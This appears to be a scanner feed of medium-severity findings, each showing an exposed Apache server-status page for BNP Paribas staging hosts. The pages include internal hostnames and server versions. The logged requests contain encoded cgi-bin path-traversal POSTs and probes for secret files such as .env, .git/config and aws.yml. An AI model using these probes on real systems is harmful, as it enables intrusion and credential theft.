127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-24126402850/27/8208_ 0.88262909582730.00.0588.90 127.0.0.1http/1.1127.0.1.1:8080GET /devicedesc.xml HTTP/1.1 0-24126402850/26/8197_ 0.863265010074280.00.03100.00 127.0.0.1http/1.1127.0.1.1:8080GET /start.cfm HTTP/1.1 1-238-0/0/10410. 0.0022983517782730.00.0069.69 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-238-0/0/10394. 0.0022983527835190.00.0071.29 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-238-0/0/10388. 0.0022983507367750.00.0073.17 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10437. 0.0022983517890690.00.0074.20 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10406. 0.0022983507859410.00.0073.17 127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1 1-238-0/0/10431. 0.0022983517624600.00.0071.59 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10428. 0.0022983517738660.00.0070.49 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10347. 0.0022983518932110.00.0079.61 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10472. 0.0022983517864620.00.0071.38 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10334. 0.0022983518025510.00.0073.82 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10336. 0.0022983517613980.00.0068.80 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10336. 0.0022983517764360.00.0070.62 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10392. 0.0022983507727830.00.0072.10 127.0.0.1http/1.1127.0.1.1:8080GET /RDWeb/Pages/ HTTP/1.1 1-238-0/0/10289. 0.0022983517905570.00.0069.69 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10408. 0.0022983528059850.00.0068.66 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-238-0/0/10385. 0.00229835110412690.00.0078.73 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10361. 0.0022983517214310.00.0070.09 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10317. 0.0022983528241210.00.0071.97 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-238-0/0/10357. 0.0022983507960580.00.0073.16 127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e 1-238-0/0/10295. 0.0022983527704010.00.0072.52 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-238-0/0/10327. 0.0022983507942500.00.0069.29 127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32 1-238-0/0/10439. 0.0022983547890300.00.0068.69 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-238-0/0/10315. 0.0022983508039900.00.0069.04 127.0.0.1http/1.1127.0.1.1:8080GET /.env HTTP/1.1 1-238-0/0/10346. 0.0022983518302240.00.0071.42 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10356. 0.0022983547974700.00.0069.06 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 2-24126402840/41/8397_ 1.94111113470
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b25154699c8f
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.62 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2024-10-04T15:21:08 Current Time: Wednesday, 06-Aug-2025 15:06:17 CEST Restart Time: Tuesday, 10-Dec-2024 16:11:42 CET Parent Server Config. Generation: 240 Parent Server MPM Generation: 239 Server uptime: 238 days 21 hours 54 minutes 34 seconds Server load: 0.27 0.11 0.03 Total accesses: 857740 - Total Traffic: 7.6 GB - Total Duration: 103440763 CPU Usage: u609.45 s832.27 cu1074.22 cs380.49 - .014% CPU load .0416 requests/sec - 394 B/second - 9.3 kB/request - 120.597 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 02341947no0yes0025000 22341877no1yes1024010 Sum201 1049010 _________________________.........................______________ _________W_..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-23923419470/68/8101_ 4.51863649710490.01.18108.28 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080POST /bmci/wp-admin/admin-ajax.php HTTP/1.1 0-23923419470/69/7995_ 4.478609574730.00.9190.61 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080GET /wp-content/themes/bmci/img/icon-a-minus.png HTTP/1.1 0-23923419470/71/7920_ 4.54703299574780.00.7975.56 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080POST /bmci/wp-admin/admin-ajax.php HTTP/1.1 0-23923419470/70/7959_ 4.51763849294290.00.6774.33 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080POST /bmci/wp-admin/admin-ajax.php HTTP/1.1 0-23923419470/70/7953_ 4.487609469310.00.6084.42 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080GET /wp-content/plugins/gravityforms/js/jquery.json.min.js?ver= 0-23923419470/69/7941_ 4.4796010113140.00.6582.74 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080GET /wp-content/themes/bmci/img/icon-fb.png HTTP/1.1 0-23923419470/70/8035_ 4.51653559543530.00.6487.71 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080POST /bmci/wp-admin/admin-ajax.php HTTP/1.1 0-23923419470/79/8049_ 4.486509847740.00.74124.48 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080GET /wp-content/plugins/gravityforms/js/jquery.maskedinput.min. 0-23923419470/71/8027_ 4.54508049666810.01.4693.27 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080POST /bmci/wp-admin/admin-ajax.php HTTP/1.1 0-23923419470/69/7983_ 4.4615809949120.00.46107.29 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080GET /wp-includes/js/dist/a11y.min.js?ver=3156534cc54473497e14 H 0-23923419470/69/7996_ 4.494519413670.00.9175.17 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080GET /wp-content/plugins/gravityforms/assets/js/dist/vendor-them 0-23923419470/72/8024_ 4.53813319519790.00.5290.76 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080POST /bmci/wp-admin/admin-ajax.php HTTP/1.1 0-23923419470/73/7944_ 4.52453279293910.00.6279.02 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080POST /bmci/wp-admin/admin-ajax.php HTTP/1.1 0-23923419470/65/7944_ 4.493419770890.00.80102.16 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080GET /wp-content/blogs.dir/sites/2/2019/03/Credito-pose06.png HT 0-23923419470/70/8039_ 4.501586869121010.01.66114.12 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080POST /bmci/wp-admin/admin-ajax.php HTTP/1.1 0-23923419470/74/7881_ 4.54393399399990.00.8584.51 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080POST /bmci/wp-admin/admin-ajax.php HTTP/1.1 0-23923419470/67/7972_ 4.52346989419620.00.6183.90 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080POST /bmci/wp-admin/admin-ajax.php HTTP/1.1 0-23923419470/69/8010_ 4.491683509489570.00.49111.03 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080POST /wp-admin/admin-ajax.php HTTP/1.1 0-23923419470/76/8022_ 4.521633549574150.01.0078.07 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080POST /bmci/wp-admin/admin-ajax.php HTTP/1.1 0-23923419470/59/8027_ 4.521433219319600.00.4691.18 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080POST /bmci/wp-admin/admin-ajax.php HTTP/1.1 0-23923419470/63/7935_ 4.4713809407850.02.1794.02 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080GET /wp-content/img/ico-smartph.png HTTP/1.1 0-23923419470/63/7963_ 4.4613809484740.00.59129.95 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080GET /wp-content/themes/bmci/img/icon-phone.png HTTP/1.1 0-23923419470/65/8054_ 4.521013419713550.01.2879.97 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080POST /bmci/wp-admin/admin-ajax.php HTTP/1.1 0-23923419470/65/7940_ 4.53913499436030.00.8186.68 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080POST /bmci/wp-admin/admin-ajax.php HTTP/1.1 0-23923419470/66/7932_ 4.519609965140.01.2498.07 127.0.0.1http/1.1bmci.stagingirb.bnpparibas:8080GET /bmci/wp-content/themes/bmci/img/nav-border-r.png HTTP/1.1 1-238-0/0/10410. 0.005437017782730.00.0069.69 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-238-0/0/10394. 0.005437027835190.00.0071.29 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-238-0/0/10388. 0.005437007367750.00.0073.17 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10437. 0.005437017890690.00.0074.20 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10406. 0.005437007859410.00.0073.17 127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1 1-238-0/0/10431. 0.005437017624600.00.0071.59 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10428. 0.005437017738660.00.0070.49 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10347. 0.005437018932110.00.0079.61 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10472. 0.005437017864620.00.0071.38 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10334. 0.005437018025510.00.0073.82 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10336. 0.005437017613980.00.0068.80 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10336. 0.005437017764360.00.0070.62 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10392. 0.005437007727830.00.0072.10 127.0.0.1http/1.1127.0.1.1:8080GET /RDWeb/Pages/ HTTP/1.1 1-238-0/0/10289. 0.005437017905570.00.0069.69 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10408. 0.005437028059850.00.0068.66 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-238-0/0/10385. 0.0054370110412690.00.0078.73 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10361. 0.005437017214310.00.0070.09 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-238-0/0/10317. 0.005437028241210.00.0071.97 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-238-0/0/10357. 0.005437007960580.00.0073.16 127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e 1-238-0/0/10295. 0.005437027704010.00.0072.52 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-238-0/0/10327. 0.005437007942500.00.0069.29 127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32 1-238-0/0/10439. 0.005437047890300.00.0068.69 127.0.0.1http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b2518aba3b12
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.62 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2024-10-04T15:21:08 Current Time: Tuesday, 05-Aug-2025 06:34:58 CEST Restart Time: Tuesday, 10-Dec-2024 16:11:42 CET Parent Server Config. Generation: 239 Parent Server MPM Generation: 238 Server uptime: 237 days 13 hours 23 minutes 15 seconds Server load: 0.02 0.02 0.00 Total accesses: 854208 - Total Traffic: 7.6 GB - Total Duration: 103329609 CPU Usage: u601.41 s826.37 cu1072.05 cs379.67 - .014% CPU load .0416 requests/sec - 395 B/second - 9.3 kB/request - 120.965 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 12193181no0yes1024000 22193180no0yes0025000 Sum200 1049000 ........................._________W_____________________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-233-0/0/8033. 0.0036929309639600.00.00107.10 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 0-233-0/0/7926. 0.0036929309429070.00.0089.69 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 0-233-0/0/7849. 0.0036929319550820.00.0074.77 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-233-0/0/7889. 0.0036929319279420.00.0073.66 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-233-0/0/7883. 0.0036929309459900.00.0083.82 127.0.0.1http/1.1127.0.1.1:8080GET /version HTTP/1.1 0-233-0/0/7872. 0.00369293010070800.00.0082.09 127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1 0-233-0/0/7965. 0.0036929319538620.00.0087.07 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-233-0/0/7970. 0.0036929309820780.00.00123.74 127.0.0.1http/1.1127.0.1.1:8080GET /.DS_Store HTTP/1.1 0-233-0/0/7956. 0.0036929309656760.00.0091.80 127.0.0.1http/1.1127.0.1.1:8080GET /.env HTTP/1.1 0-233-0/0/7914. 0.0036929329943280.00.00106.83 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-233-0/0/7927. 0.0036929319393970.00.0074.26 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-233-0/0/7952. 0.0036929319473770.00.0090.24 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-233-0/0/7871. 0.0036929319281600.00.0078.40 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-233-0/0/7879. 0.0036929309752030.00.00101.36 127.0.0.1http/1.1127.0.1.1:8080GET /login.action HTTP/1.1 0-233-0/0/7969. 0.0036929319086030.00.00112.46 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-233-0/0/7807. 0.0036929379374390.00.0083.66 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 0-233-0/0/7905. 0.0036929319394320.00.0083.30 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-233-0/0/7941. 0.0036929349469680.00.00110.54 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-233-0/0/7946. 0.0036929309557300.00.0077.07 127.0.0.1http/1.1127.0.1.1:8080GET /info.php HTTP/1.1 0-233-0/0/7968. 0.0036929319298810.00.0090.72 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-233-0/0/7872. 0.0036929309404070.00.0091.85 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 0-233-0/0/7900. 0.0036929309443080.00.00129.35 127.0.0.1http/1.1127.0.1.1:8080GET /config.json HTTP/1.1 0-233-0/0/7989. 0.0036929309694480.00.0078.68 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 0-233-0/0/7875. 0.0036929309421930.00.0085.87 127.0.0.1http/1.1127.0.1.1:8080GET /s/339313e2432313e29313e2236313/_/;/META-INF/maven/com.atla 0-233-0/0/7866. 0.0036929319897360.00.0096.83 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-23821931810/13/10398_ 0.33117782590.00.0269.67 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-23821931810/12/10381_ 0.33107835000.00.0171.26 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 1-23821931810/11/10380_ 0.33107367670.00.0173.17 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 1-23821931810/13/10426_ 0.33107890560.00.0274.18 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 1-23821931810/12/10394_ 0.33007859270.00.0273.15 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 1-23821931810/12/10421_ 0.33007624450.00.0171.57 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 1-23821931810/12/10417_ 0.33007738560.00.0170.47 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 1-23821931810/12/10335_ 0.33008932000.00.0179.60 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 1-23821931810/12/10462_ 0.33007864460.00.0171.35 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-238219318110/12/10324W 0.27008025290.00.0173.80 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 1-23821931810/12/10329_ 0.2813607613820.00.0168.79 127.0.0.1http/1.1127.0.1.1:8080GET /storage/logs/laravel.log HTTP/1.1 1-23821931810/10/10323_ 0.32104137764200.00.0170.59 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-23821931810/11/10380_ 0.28103617727670.00.0272.08 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-23821931810/12/10279_ 0.27103607905500.00.0269.67 127.0.0.1http/1.1127.0.1.1:8080GET /server.js HTTP/1.1 1-23821931810/10/10396_ 0.3282418059660.00.0168.64 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-23821931810/11/10375_ 0.30136410412490.00.0178.71 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-23821931810/11/10349_ 0.2981907214060.00.0170.07 127.0.0.1http/1.1127.0.1.1:8080GET /api/v2/static/not.found HTTP/1.1 1-23821931810/12/10308_ 0.2781908241060.00.0271.95 127.0.0.1http/1.1127.0.1.1:8080GET /config/aws.yml HTTP/1.1 1-23821931810/10/10346_ 0.3274127960380.00.0173.14 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-23821931810/11/10283_ 0.2973607703820.00.0172.50 127.0.0.1http/1.1127.0.1.1:8080GET /login?redir=/ng HTTP/1.1 1-23821931810/12/10315_ 0.2773607942390.00.0169.27 127.0.0.1http/1.1127.0.1.1:8080GET /main.js HTTP/1.1 1-23821931810/10/10427_ 0.3222417890120.00.0168.67 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-23821931810/11/10305_ 0.2921928039780.00.0169.01 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-23821931810/12/10338_ 0.2821908302120.00.0171.40 127.0.0.1http/1.1127.0.1.1:8080GET /public/js/main.js HTTP/1.1 1-23821931810/10/10344_ 0.3314147974490.00.0169.03 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 2-23821931800/18/8228_ </
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b2516e9190ba
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.62 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2024-10-04T15:21:08 Current Time: Sunday, 03-Aug-2025 12:15:29 CEST Restart Time: Tuesday, 10-Dec-2024 16:11:42 CET Parent Server Config. Generation: 237 Parent Server MPM Generation: 236 Server uptime: 235 days 19 hours 3 minutes 46 seconds Server load: 0.11 0.06 0.01 Total accesses: 851830 - Total Traffic: 7.5 GB - Total Duration: 103326735 CPU Usage: u597.83 s820.29 cu1067.63 cs378.14 - .0141% CPU load .0418 requests/sec - 397 B/second - 9.3 kB/request - 121.3 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 11896544no0yes0025000 21896543no0yes1024000 Sum200 1049000 ........................._______________________________________ ____W______..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-233-0/0/8033. 0.0021692509639600.00.00107.10 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 0-233-0/0/7926. 0.0021692509429070.00.0089.69 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 0-233-0/0/7849. 0.0021692519550820.00.0074.77 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-233-0/0/7889. 0.0021692519279420.00.0073.66 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-233-0/0/7883. 0.0021692509459900.00.0083.82 127.0.0.1http/1.1127.0.1.1:8080GET /version HTTP/1.1 0-233-0/0/7872. 0.00216925010070800.00.0082.09 127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1 0-233-0/0/7965. 0.0021692519538620.00.0087.07 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-233-0/0/7970. 0.0021692509820780.00.00123.74 127.0.0.1http/1.1127.0.1.1:8080GET /.DS_Store HTTP/1.1 0-233-0/0/7956. 0.0021692509656760.00.0091.80 127.0.0.1http/1.1127.0.1.1:8080GET /.env HTTP/1.1 0-233-0/0/7914. 0.0021692529943280.00.00106.83 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-233-0/0/7927. 0.0021692519393970.00.0074.26 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-233-0/0/7952. 0.0021692519473770.00.0090.24 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-233-0/0/7871. 0.0021692519281600.00.0078.40 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-233-0/0/7879. 0.0021692509752030.00.00101.36 127.0.0.1http/1.1127.0.1.1:8080GET /login.action HTTP/1.1 0-233-0/0/7969. 0.0021692519086030.00.00112.46 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-233-0/0/7807. 0.0021692579374390.00.0083.66 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 0-233-0/0/7905. 0.0021692519394320.00.0083.30 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-233-0/0/7941. 0.0021692549469680.00.00110.54 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-233-0/0/7946. 0.0021692509557300.00.0077.07 127.0.0.1http/1.1127.0.1.1:8080GET /info.php HTTP/1.1 0-233-0/0/7968. 0.0021692519298810.00.0090.72 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-233-0/0/7872. 0.0021692509404070.00.0091.85 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 0-233-0/0/7900. 0.0021692509443080.00.00129.35 127.0.0.1http/1.1127.0.1.1:8080GET /config.json HTTP/1.1 0-233-0/0/7989. 0.0021692509694480.00.0078.68 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 0-233-0/0/7875. 0.0021692509421930.00.0085.87 127.0.0.1http/1.1127.0.1.1:8080GET /s/339313e2432313e29313e2236313/_/;/META-INF/maven/com.atla 0-233-0/0/7866. 0.0021692519897360.00.0096.83 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-23618965440/15/10358_ 1.3046907782190.00.0269.61 127.0.0.1http/1.1127.0.1.1:8080GET /telescope/requests HTTP/1.1 1-23618965440/22/10336_ 1.2947007834380.00.0471.18 127.0.0.1http/1.1127.0.1.1:8080GET /config.json HTTP/1.1 1-23618965440/15/10338_ 1.2847107367230.00.0373.09 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-23618965440/16/10387_ 1.3017507890050.00.0374.13 127.0.0.1http/1.1127.0.1.1:8080GET /robots.txt HTTP/1.1 1-23618965440/22/10353_ 1.3017217858750.00.0473.08 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-23618965440/11/10382_ 1.2816707623870.00.0371.51 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 1-23618965440/14/10383_ 1.2816707738180.00.0370.40 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 1-23618965440/21/10295_ 1.2544008931630.00.0579.53 127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1 1-23618965440/22/10413_ 1.2847107863700.00.0671.27 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 1-23618965440/11/10288_ 1.2844018024890.00.0373.74 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-23618965440/14/10296_ 1.2847157613390.00.0368.73 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 1-23618965440/16/10278_ 1.3025617763590.00.0370.51 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-23618965440/22/10339_ 1.2825107727010.00.0472.01 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 1-23618965440/21/10238_ 1.2847107905030.00.0469.59 127.0.0.1http/1.1127.0.1.1:8080GET /login.action HTTP/1.1 1-23618965440/14/10359_ 1.2847108059330.00.0268.58 127.0.0.1http/1.1127.0.1.1:8080GET /_all_dbs HTTP/1.1 1-23618965440/10/10340_ 1.28251010412060.00.0178.64 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 1-23618965440/11/10313_ 1.3046907213510.00.0270.01 127.0.0.1http/1.1127.0.1.1:8080GET /info.php HTTP/1.1 1-23618965440/14/10271_ 1.2947008240570.00.0371.89 127.0.0.1http/1.1127.0.1.1:8080GET /.DS_Store HTTP/1.1 1-23618965440/22/10306_ 1.2947007959950.00.0473.08 127.0.0.1http/1.1127.0.1.1:8080GET /.env HTTP/1.1 1-23618965440/20/10239_ 1.3046917703360.00.0472.41 127.0.0.1http/1.1127.0.1.1:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-23618965440/17/10273_ 1.2246417941910.00.0469.20 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-23618965440/15/10386_ 1.2947007889660.00.0368.60 127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1 1-23618965440/13/10267_ 1.2947008039350.00.0268.95 127.0.0.1http/1.1127.0.1.1:8080GET /s/334323e2333313e27363e23323/_/;/META-INF/maven/com.atlass 1-23618965440/10/10307_ 1.2746418301830.00.0271.35 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-23618965440/17/10301_ 1.3044517973880.00.0468.96 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 2-23618965430/8/8162_ 0.45112
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b25177af531f
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.62 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2024-10-04T15:21:08 Current Time: Saturday, 02-Aug-2025 10:45:28 CEST Restart Time: Tuesday, 10-Dec-2024 16:11:42 CET Parent Server Config. Generation: 236 Parent Server MPM Generation: 235 Server uptime: 234 days 17 hours 33 minutes 45 seconds Server load: 0.02 0.03 0.00 Total accesses: 850182 - Total Traffic: 7.5 GB - Total Duration: 103324559 CPU Usage: u594.52 s816.72 cu1065.27 cs377.26 - .0141% CPU load .0419 requests/sec - 399 B/second - 9.3 kB/request - 121.532 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 11748243no0yes0025000 21748241no1yes1024010 Sum201 1049010 